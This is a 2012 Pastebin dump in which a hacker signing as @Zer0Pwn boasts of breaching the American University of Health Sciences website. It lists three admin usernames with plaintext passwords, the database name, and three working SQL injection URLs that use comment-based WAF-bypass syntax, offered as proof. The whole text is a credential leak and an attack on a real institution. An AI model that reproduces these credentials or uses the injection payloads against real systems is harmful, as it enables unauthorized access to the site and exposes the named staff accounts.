Guest User

American University of Health and Sciences [HACKED] @Zer0Pwn

a guest
Jun 5th, 2012
342
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.96 KB | None | 0 0
  1. ______ ___ _____
  2. |___ / / _ \| __ \
  3. / / ___ _ __| | | | |__) |_ ___ __
  4. / / / _ \ '__| | | | ___/\ \ /\ / / '_ \
  5. / /_| __/ | | |_| | | \ V V /| | | |
  6. /_____\___|_| \___/|_| \_/\_/ |_| |_| @Zer0Pwn - Zer0Pwn
  7. #############################################
  8.  
  9. Here is my message.
  10. You were somewhat targeted.
  11. To prove lack of security, in even what are supposed to be the most advanced web-systems on the internet.
  12. Your security is a joke.
  13.  
  14. To all of you celebrating it wasn't you that got hacked... Be prepared -- Because you just might be next.
  15. Secure your web-systems.
  16. I love challenges.
  17.  
  18. #############################################
  19. Today's dump includes...
  20. Admin passwords for the America University of Health Sciences.
  21.  
  22. Target ==> American University of Health Sciences
  23. URL ==> http://www.auhs.edu/
  24. Reason ==> To prove lack of security in anything, and everything.
  25. Vulnerability ==> SQL Injection with WAF Bypassing.
  26. MySQL Version ==> 5.
  27. Database Name ==> gjohnson_website
  28.  
  29. #############################################
  30.  
  31. These are the admin users for the website.
  32. Username:Password (Keep in mind these are plaintext ^_^).
  33.  
  34. #########################
  35. # tam:auhsweb4321 #
  36. # nguyen:4567 #
  37. # toannguyen:toan12345 #
  38. #########################
  39.  
  40. Proof ==> (USER 1) http://www.auhs.edu/mainpage.php?pageID=-4 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,/*!CoNcAt*/(user_login,0x3a,user_pass) FROM gjohnson_website.tbl_users limit 0,1--+-
  41.  
  42. (USER 2) http://www.auhs.edu/mainpage.php?pageID=-4 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,/*!CoNcAt*/(user_login,0x3a,user_pass) FROM gjohnson_website.tbl_users limit 1,1--+-
  43.  
  44.  
  45. (USER 2) http://www.auhs.edu/mainpage.php?pageID=-4 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,/*!CoNcAt*/(user_login,0x3a,user_pass) FROM gjohnson_website.tbl_users limit 2,1--+-
  46.  
  47. #############################################
  48.  
  49. For more action, follow me on twitter @Zer0Pwn.
Add Comment
Please, Sign In to add comment